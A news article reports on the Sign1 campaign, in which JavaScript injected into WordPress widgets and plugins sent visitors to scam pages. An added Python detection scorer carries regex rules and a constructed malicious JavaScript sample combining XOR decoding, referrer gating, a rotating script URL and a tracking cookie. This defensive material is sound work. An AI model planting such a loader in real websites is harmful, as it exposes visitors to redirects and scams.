Malware infected 39,000 websites made with WordPress


A previously unknown malware campaign, dubbed Sign1, has infected more than 39,000 websites in the last six months, causing unwanted redirects and pop-up ads for visitors.

Threat actors inject the malicious Sign1 scripts into custom HTML widgets and legitimate plugins on WordPress websites, rather than modifying the actual WordPress files.

Website security company Sucuri discovered the campaign after a client’s website began randomly displaying pop-up ads to visitors.

While Sucuri’s client was compromised through a brute force attack, Sucuri has not shared how the other detected sites were compromised.

However, based on previous attacks on WordPress, it likely involves a combination of brute force attacks and exploiting plugin vulnerabilities to gain access to the site.

Malware uses widgets and plugins

Once threat actors gain access, they use custom WordPress HTML widgets or, more commonly, install the legitimate Simple Custom CSS and JS plugin to inject malicious JavaScript code.

Sucuri’s analysis of Sign1 shows that the malware uses time-based randomization to generate dynamic URLs that change every 10 minutes to avoid blocking. Domains are registered shortly before they are used in attacks, so they are not yet on any blocklist.

These URLs serve to fetch more malicious scripts that run in the visitor’s browser.

Initially, the domains were hosted on Namecheap, but the attackers have since switched to HETZNER for hosting and Cloudflare to hide the IP address.

Domains and number of attacks – Source: Sucuri

It is worth noting that the injected code presents XOR encoding and apparently random variable names, making detection by security tools more difficult.

The malicious code checks specific referrers and cookies before executing. It only targets visitors arriving from major websites such as Google, Facebook, Yahoo and Instagram, and remains dormant in all other cases.

Additionally, the code creates a cookie in the target’s browser so that the pop-up is only displayed once per visitor. This makes reporting to the owner of the compromised site less likely.
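The behaviours described above (XOR string decoding, a URL that rotates on a 10-minute clock, a referrer gate, a "shown once" cookie and random-looking variable names) can be turned into a simple triage check for snippets stored in Custom HTML widgets or the Simple Custom CSS and JS plugin. The following scorer is an added example, not Sucuri's code or the actual Sign1 script; the regexes, the threshold and both sample snippets are this example's own constructions.

```python
import re

# Heuristic indicators drawn from the Sign1 description above. The regexes and
# the threshold are assumptions of this example, not Sucuri's detection rules.
INDICATORS = {
    "xor_decode": re.compile(r"charCodeAt\([^)]*\)\s*\^"),
    "time_bucketed_url": re.compile(
        r"Math\.floor\(\s*(?:Date\.now\(\)|new Date\(\)\.getTime\(\))\s*/\s*(\d+)\s*\)"),
    "referrer_gate": re.compile(r"document\.referrer"),
    "cookie_set": re.compile(r"document\.cookie\s*="),
    "dynamic_script_tag": re.compile(r"createElement\(\s*['\"]script['\"]\s*\)"),
}
IDENT = re.compile(r"\b(?:var|let|const)\s+([A-Za-z_$][\w$]{7,})\b")


def looks_random(name: str) -> bool:
    """Crude proxy for machine-generated names: long, mixing upper, lower and digits."""
    return (any(c.isupper() for c in name) and any(c.islower() for c in name)
            and any(c.isdigit() for c in name))


def score_snippet(js: str) -> dict:
    """Return matched indicators and, if present, the URL rotation period in minutes."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(js)]
    if any(looks_random(n) for n in IDENT.findall(js)):
        hits.append("random_identifiers")
    m = INDICATORS["time_bucketed_url"].search(js)
    period = int(m.group(1)) / 60000 if m else None  # divisor is in milliseconds
    return {"hits": hits, "score": len(hits), "rotation_minutes": period}


def is_suspicious(js: str, threshold: int = 3) -> bool:
    return score_snippet(js)["score"] >= threshold


# Constructed stand-in showing the described traits; it is not the real Sign1 code.
SAMPLE_INJECTED = r"""
var qX7vZk9pL = ""; for (var i = 0; i < s.length; i++) { qX7vZk9pL += String.fromCharCode(s.charCodeAt(i) ^ 7); }
if (/google|facebook|yahoo|instagram/i.test(document.referrer) && document.cookie.indexOf("seen=") < 0) {
  var t = Math.floor(Date.now() / 600000);
  var e = document.createElement("script"); e.src = "https://example.invalid/" + t + ".js";
  document.cookie = "seen=1; max-age=86400"; document.head.appendChild(e);
}
"""
# Constructed benign snippet of the kind a site owner might legitimately add.
SAMPLE_BENIGN = r"""
document.addEventListener("DOMContentLoaded", function () {
  var banner = document.getElementById("cookie-banner");
  if (banner) banner.style.display = "block";
});
"""

if __name__ == "__main__":
    for label, js in (("injected", SAMPLE_INJECTED), ("benign", SAMPLE_BENIGN)):
        print(label, score_snippet(js))
```

Feed it the stored widget and plugin snippets exported from the database; anything scoring at or above the threshold is worth a manual look rather than an automatic block.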

Redirects

The script then redirects the visitor to scam sites, such as fake captchas that try to trick the visitor into enabling browser notifications. These notifications then deliver unwanted advertisements directly to the operating system’s desktop.

Sucuri warns that Sign1 has evolved over the past six months, with infections increasing when a new version of the malware is released.

Over the past six months, Sucuri’s scanners have detected the malware on more than 39,000 websites, while the latest wave of attacks, which has been ongoing since January 2024, affected 2,500 websites.

The campaign has evolved over time to become more stealthy and resistant to blocking, which is a worrying development.

To protect your sites against these campaigns, use a strong/long admin password and update your plugins to the latest version. Additionally, unnecessary add-ons should be removed as they can serve as a potential attack surface.

Daily downloads – Source: Sucuri

Source: Atrevida
